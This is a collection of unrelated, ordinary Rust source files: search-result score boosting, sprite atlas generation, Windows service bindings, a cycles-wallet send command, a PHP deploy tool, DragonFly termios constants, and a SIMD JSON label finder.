boost_fun: &Option<BoostFunction>,
explain: &mut Option<&mut FnvHashMap<u32, Vec<Explain>>>,
expre: &Option<ScoreExpression>,
) -> Result<(), VelociError> {
match boost_fun {
Some(BoostFunction::Log10) => {
// if hits.request.explain {
// let entry = hits.explain.entry(value_id).or_insert_with(Vec::new);
// entry.push(Explain::Boost((boost_value as f32 + boost_param).log10()));
// }
if let Some(explain) = explain {
let entry = explain.entry(hit.id).or_insert_with(Vec::new);
entry.push(Explain::Boost((boost_value + boost_param).log10()));
}
trace!(
"Log10 boosting hit.id {:?} score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param).log10(),
boost_value,
(boost_value + boost_param).log10(),
);
hit.score *= (boost_value + boost_param).log10();
}
Some(BoostFunction::Log2) => {
trace!(
"Log2 boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param).log2(),
boost_value,
(boost_value + boost_param).log2(),
);
hit.score *= (boost_value + boost_param).log2();
}
Some(BoostFunction::Multiply) => {
trace!(
"Multiply boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score *= boost_value + boost_param;
}
Some(BoostFunction::Add) => {
trace!(
"boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score + (boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score += boost_value + boost_param;
}
Some(BoostFunction::Replace) => {
trace!(
"replace hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
(boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score = boost_value + boost_param;
}
None => {}
}
if let Some(exp) = expre.as_ref() {
let prev_score = hit.score;
hit.score += exp.get_score(boost_value);
trace!(
"boost {:?} to {:?} with boost_fun({:?})={:?}",
prev_score,
hit.score,
boost_value,
exp.get_score(boost_value)
);
}
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
if let Some(explain) = explain {
let data = explain.entry(hit.id).or_insert_with(Vec::new);
data.push(Explain::Boost(hit.score));
}
Ok(())
}
/// applies the boost values from the boostparts to the result
pub(crate) fn boost_hits_ids_vec_multi(mut results: SearchFieldResult, boost: &mut [SearchFieldResult]) -> SearchFieldResult {
{
debug_time!("boost hits sort input");
results.hits_scores.sort_unstable_by_key(|el| el.id); //TODO SORT NEEDED??
for res in boost.iter_mut() {
res.hits_scores.sort_unstable_by_key(|el| el.id);
res.hits_ids.sort_unstable();
}
}
let mut boost_iter = boost
.iter()
.map(|el| {
let boost_val: f32 = el.request.boost.map(|el| el.into_inner()).unwrap_or(2.0);
debug_assert!(!boost_val.is_nan());
debug_assert!(boost_val != std::f32::INFINITY);
el.hits_ids.iter().map(move |id| Hit::new(*id, boost_val))
})
.kmerge_by(|a, b| a.id < b.id);
debug_time!("boost_hits_ids_vec_multi");
apply_boost_from_iter(results, &mut boost_iter)
}
#[test]
fn boost_intersect_hits_vec_test_multi() {
let hits1 = vec![Hit::new(10, 20.0), Hit::new(0, 20.0), Hit::new(5, 20.0), Hit::new(60, 20.0)]; // unsorted
let boost = vec![0, 3, 10, 10, 70];
let boost2 = vec![10, 60];
let mut boosts = vec![
SearchFieldResult {
hits_ids: boost,
..Default::default()
},
SearchFieldResult {
hits_ids: boost2,
..Default::default()
},
];
let res = boost_hits_ids_vec_multi(
SearchFieldResult {
hits_scores: hits1,
..Default::default()
},
&mut boosts,
);
assert_eq!(res.hits_scores, vec![Hit::new(0, 40.0), Hit::new(5, 20.0), Hit::new(10, 160.0), Hit::new(60, 40.0)]);
}
pub(crate) fn get_boost_ids_and_resolve_to_anchor(persistence: &Persistence, path: &mut FieldPath, hits: &mut SearchFieldResult) -> Result<(), VelociError> {
// let boost_path = path.add(BOOST_VALID_TO_VALUE);
path.suffix = Some(BOOST_VALID_TO_VALUE);
let boostkv_store = persistence.get_boost(&path.as_string())?;
hits.hits_ids.sort_unstable();
// trace_index_id_to_parent(boostkv_store);
for value_id in &mut hits.hits_ids {
let val_opt = boostkv_store.get_value(*value_id as u64);
if let Some(boost_value) = val_opt.as_ref() {
let boost_value = f32::from_bits(*boost_value);
hits.boost_ids.push(Hit::new(*value_id, boost_value));
}
}
hits.hits_ids = vec![];
// resolve to anchor
let mut data = vec![];
path.suffix = Some(VALUE_ID_TO_ANCHOR);
let kv_store = persistence.get_valueid_to_parent(&path.as_string())?; //TODO should be get_kv_store
for boost_pair in &mut hits.boost_ids {
let val_opt = kv_store.get_value(u64::from(boost_pair.id));
if let Some(anchor_id) = val_opt.as_ref() {
data.push(Hit::new(*anchor_id, boost_pair.score));
} else {
// can this happen: value_id without anchor id. I think not
}
}
hits.boost_ids = data;
Ok(())
}
pub(crate) fn add_boost(persistence: &Persistence, boost: &RequestBoostPart, hits: &mut SearchFieldResult) -> Result<(), VelociError> {
// let key = util::boost_path(&boost.path);
let boost_path = boost.path.to_string() + BOOST_VALID_TO_VALUE;
let boostkv_store = persistence.get_boost(&boost_path)?;
let boost_param = boost.param.map(|el| el.into_inner()).unwrap_or(0.0);
let expre = boost.expression.as_ref().map(|expression| ScoreExpression::new(expression.clone()));
let default = vec![];
let skip_when_score = boost
.skip_when_score
.as_ref()
.map(|vecco| vecco.iter().map(|el| el.into_inner()).collect())
.unwrap_or(default);
let mut explain = if hits.request.is_explain() { Some(&mut hits.explain) } else { None };
for hit in &mut hits.hits_scores {
if !skip_when_score.is_empty() && skip_when_score.iter().any(|x| (*x - hit.score).abs() < 0.00001) {
// float comparisons should usually include a error margin
continue;
}
let val_opt = &boostkv_store.get_value(hit.id as u64);
if let Some(boost_value) = val_opt.as_ref() {
trace!("Found in boosting for value_id {:?}: {:?}", hit.id, val_opt);
let boost_value = f32::from_bits(*boost_value);
trace!("Found in boosting for value_id {:?}: {:?}", hit.id, boost_value);
apply_boost(hit, boost_value, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
}
Ok(())
}
|
use image::{GenericImage, RgbaImage};
use regex::Regex;
use std::collections::hash_map::Entry;
use std::collections::HashMap;
use std::fs::File;
use std::io::{BufWriter, Write};
use std::ops::Deref;
use std::path::Path;
use texture_packer::exporter::ImageExporter;
use texture_packer::importer::ImageImporter;
use texture_packer::{MultiTexturePacker, Rect, TexturePackerConfig};
pub fn gen_sprites(
sprite_folder: impl AsRef<Path>,
out_images: impl AsRef<Path>,
out_code: impl AsRef<Path>,
size: u32,
) {
let mut packer = MultiTexturePacker::new_skyline(TexturePackerConfig {
max_width: size,
max_height: size,
..Default::default()
});
let mut entries = HashMap::new();
let root = sprite_folder.as_ref();
println!("cargo:rerun-if-changed={}", root.display());
process_dir(&mut entries, &mut packer, root, None);
let target = out_images.as_ref();
std::fs::create_dir_all(target).unwrap();
for (i, page) in packer.get_pages().iter().enumerate() {
let img = ImageExporter::export(page).unwrap();
img.save(target.join(&format!("{}.png", i))).unwrap();
}
for (name, k) in &entries {
match k {
Kind::Array(v) => {
for (i, o) in v.iter().enumerate() {
if o.is_none() {
panic!("index {} of sprite array {} is missing", i, name);
}
}
}
Kind::Just(_) => {}
}
}
let mut sprites = BufWriter::new(File::create(out_code.as_ref().join("sprites.rs")).unwrap());
write!(
sprites,
"mod sprites {{
use game_util::sprite::Sprite;
use game_util::prelude::*;
pub struct Sprites {{"
)
.unwrap();
for (name, kind) in &entries {
match kind {
Kind::Just(_) => write!(sprites, "pub {}: Sprite,", name).unwrap(),
Kind::Array(v) => write!(sprites, "pub {}: [Sprite; {}],", name, v.len()).unwrap(),
}
}
writeln!(sprites, "}}").unwrap();
write!(
sprites,
r#"
impl Sprites {{
pub async fn load(gl: &Gl, base: &str) -> Result<(Self, glow::Texture), String> {{
let tex;
unsafe {{
tex = gl.create_texture()?;
gl.bind_texture(glow::TEXTURE_2D_ARRAY, Some(tex));
gl.tex_image_3d(
glow::TEXTURE_2D_ARRAY,
0,
glow::RGBA8 as _,
{}, {0}, {},
0,
glow::RGBA,
glow::UNSIGNED_BYTE,
None
);
gl.tex_parameter_i32(
glow::TEXTURE_2D_ARRAY, glow::TEXTURE_MIN_FILTER, glow::LINEAR as _
);
"#,
size,
packer.get_pages().len()
)
.unwrap();
writeln!(sprites, "game_util::futures::try_join!(").unwrap();
for i in 0..packer.get_pages().len() {
writeln!(
sprites,
"async {{ game_util::glutil::load_texture_layer(
gl, &(base.to_owned() + \"/{}.png\"), tex, {0}
).await }},",
i
)
.unwrap();
}
writeln!(sprites, ")?;").unwrap();
write!(sprites, "}} Ok((Sprites {{").unwrap();
for (name, kind) in &entries {
write!(sprites, "{}: ", name).unwrap();
match kind {
Kind::Just(data) => write_sprite(&mut sprites, data, size),
Kind::Array(v) => {
write!(sprites, "[").unwrap();
for data in v {
write_sprite(&mut sprites, data.as_ref().unwrap(), size);
}
write!(sprites, "],").unwrap();
}
}
fn write_sprite(sprites: &mut impl Write, data: &Data, size: u32) {
write!(
sprites,
"Sprite {{\
tex: rect({}.0 / {}.0, {}.0 / {1}.0, {}.0 / {1}.0, {}.0 / {1}.0),\
trimmed_size: size2({}.0, {}.0),\
real_size: size2({}.0, {}.0),\
layer: {}.0,\
rotated: {}\
}},",
data.tex.x,
size,
data.tex.y,
data.tex.w,
data.tex.h,
if data.rotated { data.tex.h } else { data.tex.w },
if data.rotated { data.tex.w } else { data.tex.h },
data.real_size.0,
data.real_size.1,
data.layer,
data.rotated
)
.unwrap();
}
}
write!(sprites, "}}, tex))}}}}}}").unwrap();
}
fn process_dir(
entries: &mut HashMap<String, Kind>,
packer: &mut MultiTexturePacker<RgbaImage>,
path: &Path,
field_name: Option<String>,
) {
for entry in std::fs::read_dir(path).unwrap() {
let entry = entry.unwrap();
println!("cargo:rerun-if-changed={}", entry.path().display());
let t = entry.file_type().unwrap();
let file_name = entry.file_name();
let (name, array) = process_name(
field_name.as_ref().map(Deref::deref),
&file_name.to_string_lossy(),
);
if t.is_dir() {
process_dir(entries, packer, &entry.path(), Some(name));
} else if t.is_file() {
let key = match array {
Some(i) => format!("{}[{}]", name, i),
None => name.clone(),
};
let data = match process_img(packer, &key, &entry.path()) {
Some(v) => v,
None => continue,
};
if let Some(i) = array {
let v = entries.entry(name.clone()).or_insert(Kind::Array(vec![]));
match v {
Kind::Array(v) => {
while v.len() <= i {
v.push(None);
}
if v[i].is_some() {
panic!("??? two of the same index?");
}
v[i] = Some(data);
}
Kind::Just(_) => panic!("mixing sprite and array of sprites at {}", name),
}
} else {
match entries.entry(name.clone()) {
Entry::Occupied(_) => {
panic!("there's already a sprite called {}", name);
}
Entry::Vacant(e) => {
e.insert(Kind::Just(data));
}
}
}
}
}
}
#[derive(Debug)]
enum Kind {
Just(Data),
Array(Vec<Option<Data>>),
}
#[derive(Debug)]
struct Data {
tex: Rect,
real_size: (u32, u32),
layer: usize,
rotated: bool,
}
fn process_name(parent_name: Option<&str>, name: &str) -> (String, Option<usize>) {
lazy_static::lazy_static! {
static ref REGEX: Regex = Regex::new(r"^([_a-zA-Z][_\w]*)(?:.(\d+))?\.\w+$").unwrap();
};
match REGEX.captures(name) {
Some(caps) => {
let name = caps.get(1).unwrap().as_str();
let name = match parent_name {
Some(p) => format!("{}_{}", p, name),
None => name.to_owned(),
};
let index = caps.get(2).map(|m| m.as_str().parse().unwrap());
(name, index)
}
None => panic!("invalid name: {}", name),
}
}
fn process_img(packer: &mut MultiTexturePacker<RgbaImage>, key: &str, path: &Path) -> Option<Data> {
let mut img = ImageImporter::import_from_file(path).ok()?.to_rgba8();
let width = img.width();
let height = img.height();
let mut add_top_border = false;
let mut add_bottom_border = false;
for x in 0..width {
if img.get_pixel(x, 0).0[3] != 0 {
add_top_border = true;
}
if img.get_pixel(x, height - 1).0[3] != 0 {
add_bottom_border = true;
}
}
let mut add_left_border = false;
let mut add_right_border = false;
for y in 0..height {
if img.get_pixel(0, y).0[3] != 0 {
add_left_border = true;
}
if img.get_pixel(width - 1, y).0[3] != 0 {
add_right_border = true;
}
}
if add_right_border || add_left_border || add_top_border || add_bottom_border {
let new_w = add_left_border as u32 + add_right_border as u32 + width;
let new_h = add_top_border as u32 + add_bottom_border as u32 + height;
let offset_x = add_left_border as u32;
let offset_y = add_top_border as u32;
let base = img;
img = RgbaImage::new(new_w, new_h);
img.copy_from(&base, offset_x, offset_y).unwrap();
for x in 0..width {
if add_top_border {
img.put_pixel(offset_x + x, 0, *base.get_pixel(x, 0));
}
if add_bottom_border {
img.put_pixel(
offset_x + x,
img.height() - 1,
*base.get_pixel(x, height - 1),
);
}
}
for y in 0..height {
if add_left_border {
img.put_pixel(0, offset_y + y, *base.get_pixel(0, y));
}
if add_right_border {
img.put_pixel(img.width() - 1, offset_y + y, *base.get_pixel(width - 1, y));
}
}
if add_left_border && add_top_border {
img.put_pixel(0, 0, *base.get_pixel(0, 0));
}
if add_left_border && add_bottom_border {
img.put_pixel(0, img.height() - 1, *base.get_pixel(0, height - 1));
}
if add_right_border && add_top_border {
img.put_pixel(img.width() - 1, 0, *base.get_pixel(width - 1, 0));
}
if add_right_border && add_bottom_border {
img.put_pixel(
img.width() - 1,
img.height() - 1,
*base.get_pixel(width - 1, height - 1),
);
}
}
packer.pack_own(key.to_string(), img).unwrap();
let mut frame = None;
for (i, page) in packer.get_pages().iter().enumerate() {
if let Some(f) = page.get_frame(&key) {
frame = Some((i, f));
}
}
let (layer, frame) = frame.unwrap();
let mut data = Data {
tex: frame.frame,
real_size: (width, height),
layer,
rotated: frame.rotated,
};
if add_top_border {
data.tex.h -= 1;
data.tex.y += 1;
}
if add_bottom_border {
data.tex.h -= 1;
}
if add_left_border {
data.tex.w -= 1;
data.tex.x += 1;
}
if add_right_border {
data.tex.w -= 1;
}
Some(data)
}
|
use winapi::winsvc;
use winapi::winnt;
use winapi::{DWORD, LPWSTR};
use advapi32;
use util;
use std;
use std::error;
#[derive(Debug)]
pub enum ServiceAccept {
STOP,
SHUTDOWN,
POWEREVENT,
TIMECHANGE,
PARAMCHANGE,
PRESHUTDOWN,
TRIGGEREVENT,
NETBINDCHANGE,
SESSIONCHANGE,
PAUSE_CONTINUE,
HARDWAREPROFILECHANGE,
}
impl ServiceAccept {
pub fn value(&self) -> DWORD {
match *self {
ServiceAccept::STOP => winsvc::SERVICE_ACCEPT_STOP,
ServiceAccept::SHUTDOWN => winsvc::SERVICE_ACCEPT_SHUTDOWN,
ServiceAccept::POWEREVENT => winsvc::SERVICE_ACCEPT_POWEREVENT,
ServiceAccept::TIMECHANGE => winsvc::SERVICE_ACCEPT_TIMECHANGE,
ServiceAccept::PARAMCHANGE => winsvc::SERVICE_ACCEPT_PARAMCHANGE,
ServiceAccept::PRESHUTDOWN => winsvc::SERVICE_ACCEPT_PRESHUTDOWN,
ServiceAccept::TRIGGEREVENT => winsvc::SERVICE_ACCEPT_TRIGGEREVENT,
ServiceAccept::NETBINDCHANGE => winsvc::SERVICE_ACCEPT_NETBINDCHANGE,
ServiceAccept::SESSIONCHANGE => winsvc::SERVICE_ACCEPT_SESSIONCHANGE,
ServiceAccept::PAUSE_CONTINUE => winsvc::SERVICE_ACCEPT_PAUSE_CONTINUE,
ServiceAccept::HARDWAREPROFILECHANGE => winsvc::SERVICE_ACCEPT_HARDWAREPROFILECHANGE,
}
}
}
impl Into<DWORD> for ServiceAccept {
fn into(self) -> DWORD {
self.value()
}
}
#[derive(Debug)]
pub enum ServiceType {
ADAPTER,
DRIVER,
FILE_SYSTEM_DRIVER,
INTERACTIVE_PROCESS,
KERNEL_DRIVER,
RECOGNIZER_DRIVER,
TYPE_ALL,
WIN32,
WIN32_OWN_PROCESS,
WIN32_SHARE_PROCESS,
}
impl ServiceType {
pub fn value(&self) -> DWORD {
match *self {
ServiceType::ADAPTER => winnt::SERVICE_ADAPTER,
ServiceType::DRIVER => winnt::SERVICE_DRIVER,
ServiceType::FILE_SYSTEM_DRIVER => winnt::SERVICE_FILE_SYSTEM_DRIVER,
ServiceType::INTERACTIVE_PROCESS => winnt::SERVICE_INTERACTIVE_PROCESS,
ServiceType::KERNEL_DRIVER => winnt::SERVICE_KERNEL_DRIVER,
ServiceType::RECOGNIZER_DRIVER => winnt::SERVICE_RECOGNIZER_DRIVER,
ServiceType::TYPE_ALL => winnt::SERVICE_TYPE_ALL,
ServiceType::WIN32 => winnt::SERVICE_WIN32,
ServiceType::WIN32_OWN_PROCESS => winnt::SERVICE_WIN32_OWN_PROCESS,
ServiceType::WIN32_SHARE_PROCESS => winnt::SERVICE_WIN32_SHARE_PROCESS,
}
}
}
impl Into<DWORD> for ServiceType {
fn into(self) -> DWORD {
self.value()
}
}
#[derive(Debug)]
pub enum ServiceControl {
STOP,
PAUSE,
CONTINUE,
SHUTDOWN,
}
impl ServiceControl {
pub fn from_dw(value: DWORD) -> Result<Self, Box<error::Error>> {
match value {
winsvc::SERVICE_CONTROL_STOP => Ok(ServiceControl::STOP),
winsvc::SERVICE_CONTROL_PAUSE => Ok(ServiceControl::PAUSE),
winsvc::SERVICE_CONTROL_CONTINUE => Ok(ServiceControl::CONTINUE),
winsvc::SERVICE_CONTROL_SHUTDOWN => Ok(ServiceControl::SHUTDOWN),
unknown_value => Err(From::from(format!("No ServiceControl variant matching: {:?}", unknown_value))),
}
}
}
#[derive(Debug)]
pub enum ServiceState {
CONTINUE_PENDING,
PAUSE_PENDING,
PAUSED,
RUNNING,
START_PENDING,
STOP_PENDING,
STOPPED,
}
impl ServiceState {
pub fn value(&self) -> DWORD {
match *self {
ServiceState::CONTINUE_PENDING => winsvc::SERVICE_CONTINUE_PENDING,
ServiceState::PAUSE_PENDING => winsvc::SERVICE_PAUSE_PENDING,
ServiceState::PAUSED => winsvc::SERVICE_PAUSED,
ServiceState::RUNNING => winsvc::SERVICE_RUNNING,
ServiceState::START_PENDING => winsvc::SERVICE_START_PENDING,
ServiceState::STOP_PENDING => winsvc::SERVICE_STOP_PENDING,
ServiceState::STOPPED => winsvc::SERVICE_STOPPED,
}
}
}
pub struct ServiceStatus {
service_type: ServiceType,
current_state: ServiceState,
controls_accepted: Vec<ServiceAccept>,
win32_exit_code: DWORD,
service_specific_exit_code: DWORD,
check_point: DWORD,
wait_hint: DWORD,
}
impl ServiceStatus {
pub fn new(
service_type: ServiceType,
current_state: ServiceState,
controls_accepted: Vec<ServiceAccept>,
win32_exit_code: DWORD,
service_specific_exit_code: DWORD,
check_point: DWORD,
wait_hint: DWORD,
) -> Self {
ServiceStatus {
service_type,
current_state,
controls_accepted,
win32_exit_code,
service_specific_exit_code,
check_point,
wait_hint,
}
}
pub fn get_inner(&self) -> winsvc::SERVICE_STATUS {
let dwServiceType = self.service_type.value();
let dwCurrentState = self.current_state.value();
let dwControlsAccepted: DWORD = self.controls_accepted.iter().fold(0, |mut bitsum, val| { bitsum |= val.value(); bitsum});
winsvc::SERVICE_STATUS {
dwServiceType,
dwCurrentState,
dwControlsAccepted,
dwWin32ExitCode: self.win32_exit_code,
dwServiceSpecificExitCode: self.service_specific_exit_code,
dwCheckPoint: self.check_point,
dwWaitHint: self.wait_hint,
}
}
}
pub struct ServiceTable {
services: Vec<winsvc::SERVICE_TABLE_ENTRYW>,
}
impl ServiceTable {
pub fn new() -> Self {
ServiceTable {
services: Vec::new(),
}
}
pub fn register_new_service(
&mut self,
service_name: &str,
service_main: unsafe extern "system" fn(dwNumServicesArgs: DWORD, lpServiceArgVectors: *mut LPWSTR)
) {
let service = winsvc::SERVICE_TABLE_ENTRYW {
lpServiceName: util::win32_string(service_name).as_ptr(),
lpServiceProc: Some(service_main),
};
self.services.push(service);
}
pub fn start(mut self) {
self.services.push(winsvc::SERVICE_TABLE_ENTRYW { lpServiceName: std::ptr::null(), lpServiceProc: None});
unsafe { advapi32::StartServiceCtrlDispatcherW(self.services.as_ptr()) };
}
}
// #[cfg(test)]
// mod tests {
// use super::*;
// #[test]
// fn basic_test() {
// let a = ServiceAccept::STOP;
// let b = ServiceAccept::TRIGGEREVENT;
// let c = a | b;
// assert_eq!(c, 5);
// }
// }
|
use crate::commands::wallet::wallet_update;
use crate::lib::environment::Environment;
use crate::lib::error::DfxResult;
use crate::util::clap::validators::cycle_amount_validator;
use anyhow::anyhow;
use candid::CandidType;
use clap::Clap;
use ic_types::Principal;
/// Send cycles to another cycles wallet.
#[derive(Clap)]
pub struct SendOpts {
/// Canister ID of the destination cycles wallet.
destination: String,
/// Specifies the amount of cycles to send.
/// Deducted from the wallet.
#[clap(validator(cycle_amount_validator))]
amount: String,
}
pub async fn exec(env: &dyn Environment, opts: SendOpts) -> DfxResult {
#[derive(CandidType)]
struct In {
canister: Principal,
amount: u64,
}
let canister = Principal::from_text(opts.destination.clone())?;
// amount has been validated by cycle_amount_validator
let amount = opts.amount.parse::<u64>().unwrap();
let (res,): (Result<(), String>,) =
wallet_update(env, "wallet_send", In { canister, amount }).await?;
Ok(res.map_err(|err| {
anyhow!(
"Sending cycles to {} failed with: {}",
opts.destination,
err
)
})?)
}
|
use facteur::Facteur;
const INIT_END_TEXT: &'static str =
r#"Init done.
Now you may have to:
• edit your .env file and add your configuration data
• run `php artisan key:generate` in `current` dir
• setup nginx
• run your migrations
• chown your basedir with user you want to use"#;
pub fn init(postman: Facteur) {
postman
.welcome("Initialisation")
.mkdir_base()
.canonicalize_basedir()
.mkdir_release()
.clone()
.composer()
.init_env()
.init_storage()
.symlink()
.bye(INIT_END_TEXT);
}
pub fn deploy(postman: Facteur) {
postman
.welcome("Deployment")
.canonicalize_basedir()
.mkdir_release()
.clone()
.copy_env()
.composer()
.switch_storage()
.migrate()
.symlink()
.clean_old_releases()
.bye("Deployment Success");
}
pub fn rollback(postman: Facteur) {
postman
.welcome("Rollback")
.rollback()
.bye("Rollback done");
} |
--- /dev/null
+++ cargo-crates/termios-0.2.2/src/os/dragonfly.rs
@@ -0,0 +1,158 @@
+#![allow(non_camel_case_types)]
+
+extern crate libc;
+
+use libc::{c_int,c_uint,c_uchar};
+
+pub type cc_t = c_uchar;
+pub type speed_t = c_uint;
+pub type tcflag_t = c_uint;
+
+#[derive(Debug,Copy,Clone,Eq,PartialEq)]
+#[repr(C)]
+pub struct termios {
+ pub c_iflag: tcflag_t,
+ pub c_oflag: tcflag_t,
+ pub c_cflag: tcflag_t,
+ pub c_lflag: tcflag_t,
+ pub c_cc: [cc_t; NCCS],
+ c_ispeed: speed_t,
+ c_ospeed: speed_t
+}
+
+pub const NCCS: usize = 20;
+
+// c_cc characters
+pub const VEOF: usize = 0;
+pub const VEOL: usize = 1;
+pub const VEOL2: usize = 2;
+pub const VERASE: usize = 3;
+pub const VWERASE: usize = 4;
+pub const VKILL: usize = 5;
+pub const VREPRINT: usize = 6;
+pub const VERASE2: usize = 7;
+pub const VINTR: usize = 8;
+pub const VQUIT: usize = 9;
+pub const VSUSP: usize = 10;
+pub const VDSUSP: usize = 11;
+pub const VSTART: usize = 12;
+pub const VSTOP: usize = 13;
+pub const VLNEXT: usize = 14;
+pub const VDISCARD: usize = 15;
+pub const VMIN: usize = 16;
+pub const VTIME: usize = 17;
+pub const VSTATUS: usize = 18;
+pub const VCHECKPT: usize = 19;
+
+// c_iflag bits
+pub const IGNBRK: tcflag_t = 0x00000001;
+pub const BRKINT: tcflag_t = 0x00000002;
+pub const IGNPAR: tcflag_t = 0x00000004;
+pub const PARMRK: tcflag_t = 0x00000008;
+pub const INPCK: tcflag_t = 0x00000010;
+pub const ISTRIP: tcflag_t = 0x00000020;
+pub const INLCR: tcflag_t = 0x00000040;
+pub const IGNCR: tcflag_t = 0x00000080;
+pub const ICRNL: tcflag_t = 0x00000100;
+pub const IXON: tcflag_t = 0x00000200;
+pub const IXOFF: tcflag_t = 0x00000400;
+pub const IXANY: tcflag_t = 0x00000800;
+pub const IMAXBEL: tcflag_t = 0x00002000;
+
+// c_oflag bits
+pub const OPOST: tcflag_t = 0x00000001;
+pub const ONLCR: tcflag_t = 0x00000002;
+pub const OXTABS: tcflag_t = 0x00000004;
+pub const TABDLY: tcflag_t = 0x00000004;
+// pub const TAB0: tcflag_t = 0x00000000;
+pub const TAB3: tcflag_t = OXTABS;
+pub const ONOEOT: tcflag_t = 0x00000008;
+pub const OCRNL: tcflag_t = 0x00000010;
+pub const ONOCR: tcflag_t = 0x00000020;
+pub const ONLRET: tcflag_t = 0x00000040;
+
+// c_cflag bits
+pub const CIGNORE: tcflag_t = 0x00000001;
+pub const CSIZE: tcflag_t = 0x00000300;
+pub const CS5: tcflag_t = 0x00000000;
+pub const CS6: tcflag_t = 0x00000100;
+pub const CS7: tcflag_t = 0x00000200;
+pub const CS8: tcflag_t = 0x00000300;
+pub const CSTOPB: tcflag_t = 0x00000400;
+pub const CREAD: tcflag_t = 0x00000800;
+pub const PARENB: tcflag_t = 0x00001000;
+pub const PARODD: tcflag_t = 0x00002000;
+pub const HUPCL: tcflag_t = 0x00004000;
+pub const CLOCAL: tcflag_t = 0x00008000;
+pub const CCTS_OFLOW: tcflag_t = 0x00010000;
+pub const CRTSCTS: tcflag_t = CCTS_OFLOW | CRTS_IFLOW;
+pub const CRTS_IFLOW: tcflag_t = 0x00020000;
+pub const CDTR_IFLOW: tcflag_t = 0x00040000;
+pub const CDSR_OFLOW: tcflag_t = 0x00080000;
+pub const CCAR_OFLOW: tcflag_t = 0x00100000;
+pub const MDMBUF: tcflag_t = CCAR_OFLOW;
+
+// c_lflag bits
+pub const ECHOKE: tcflag_t = 0x00000001;
+pub const ECHOE: tcflag_t = 0x00000002;
+pub const ECHOK: tcflag_t = 0x00000004;
+pub const ECHO: tcflag_t = 0x00000008;
+pub const ECHONL: tcflag_t = 0x00000010;
+pub const ECHOPRT: tcflag_t = 0x00000020;
+pub const ECHOCTL: tcflag_t = 0x00000040;
+pub const ISIG: tcflag_t = 0x00000080;
+pub const ICANON: tcflag_t = 0x00000100;
+pub const ALTWERASE: tcflag_t = 0x00000200;
+pub const IEXTEN: tcflag_t = 0x00000400;
+pub const EXTPROC: tcflag_t = 0x00000800;
+pub const TOSTOP: tcflag_t = 0x00400000;
+pub const FLUSHO: tcflag_t = 0x00800000;
+pub const NOKERNINFO: tcflag_t = 0x02000000;
+pub const PENDIN: tcflag_t = 0x20000000;
+pub const NOFLSH: tcflag_t = 0x80000000;
+
+// baud rates
+pub const B0: speed_t = 0;
+pub const B50: speed_t = 50;
+pub const B75: speed_t = 75;
+pub const B110: speed_t = 110;
+pub const B134: speed_t = 134;
+pub const B150: speed_t = 150;
+pub const B200: speed_t = 200;
+pub const B300: speed_t = 300;
+pub const B600: speed_t = 600;
+pub const B1200: speed_t = 1200;
+pub const B1800: speed_t = 1800;
+pub const B2400: speed_t = 2400;
+pub const B4800: speed_t = 4800;
+pub const B9600: speed_t = 9600;
+pub const B19200: speed_t = 19200;
+pub const B38400: speed_t = 38400;
+pub const B7200: speed_t = 7200;
+pub const B14400: speed_t = 14400;
+pub const B28800: speed_t = 28800;
+pub const B57600: speed_t = 57600;
+pub const B76800: speed_t = 76800;
+pub const B115200: speed_t = 115200;
+pub const B230400: speed_t = 230400;
+// pub const B460800: speed_t = 460800;
+// pub const B921600: speed_t = 921600;
+pub const EXTA: speed_t = 19200;
+pub const EXTB: speed_t = 38400;
+
+// tcflow()
+pub const TCOOFF: c_int = 1;
+pub const TCOON: c_int = 2;
+pub const TCIOFF: c_int = 3;
+pub const TCION: c_int = 4;
+
+// tcflush()
+pub const TCIFLUSH: c_int = 1;
+pub const TCOFLUSH: c_int = 2;
+pub const TCIOFLUSH: c_int = 3;
+
+// tcsetattr()
+pub const TCSANOW: c_int = 0;
+pub const TCSADRAIN: c_int = 1;
+pub const TCSAFLUSH: c_int = 2;
+pub const TCSASOFT: c_int = 0x10;
|
use std::io::{stdin, Read};
pub fn read_line() -> String {
let mut line = String::new();
stdin().read_to_string(&mut line).unwrap();
line.trim_right().to_owned()
}
|
//! Classification ignoring the structure of the JSON and looking for the occurrence
//! of a specific member name as quickly as possible.
use crate::{
input::{error::InputError, Input},
query::JsonString,
result::InputRecorder,
BLOCK_SIZE,
};
use cfg_if::cfg_if;
/// Classifier that can quickly find a member name in a byte stream.
pub trait Memmem<'i, 'b, 'r, I: Input, const N: usize> {
/// Find a member key identified by a given [`JsonString`].
///
/// - `first_block` – optional first block to search; if not provided,
/// the search will start at the next block returned by the underlying [`Input`] iterator.
/// - `start_idx` – index of the start of search, either falling inside `first_block`,
/// or at the start of the next block.
///
/// # Errors
/// Errors when reading the underlying [`Input`] are propagated.
fn find_label(
&mut self,
first_block: Option<I::Block<'i, N>>,
start_idx: usize,
label: &JsonString,
) -> Result<Option<(usize, I::Block<'i, N>)>, InputError>;
}
#[cfg(any(target_arch = "x86", target_arch = "x86_64"))]
mod avx2_32;
#[cfg(target_arch = "x86_64")]
mod avx2_64;
mod nosimd;
mod shared;
#[cfg(any(target_arch = "x86", target_arch = "x86_64"))]
mod ssse3_32;
#[cfg(target_arch = "x86_64")]
mod ssse3_64;
cfg_if! {
if #[cfg(any(doc, not(feature = "simd")))] {
type MemmemImpl<'a, 'b, 'r, I, R> = nosimd::SequentialMemmemClassifier<'a, 'b, 'r, I, R, BLOCK_SIZE>;
}
else if #[cfg(all(simd = "avx2_64", target_arch = "x86_64"))] {
type MemmemImpl<'a, 'b, 'r, I, R> = avx2_64::Avx2MemmemClassifier64<'a, 'b, 'r, I, R>;
}
else if #[cfg(all(simd = "avx2_32", any(target_arch = "x86_64", target_arch = "x86")))] {
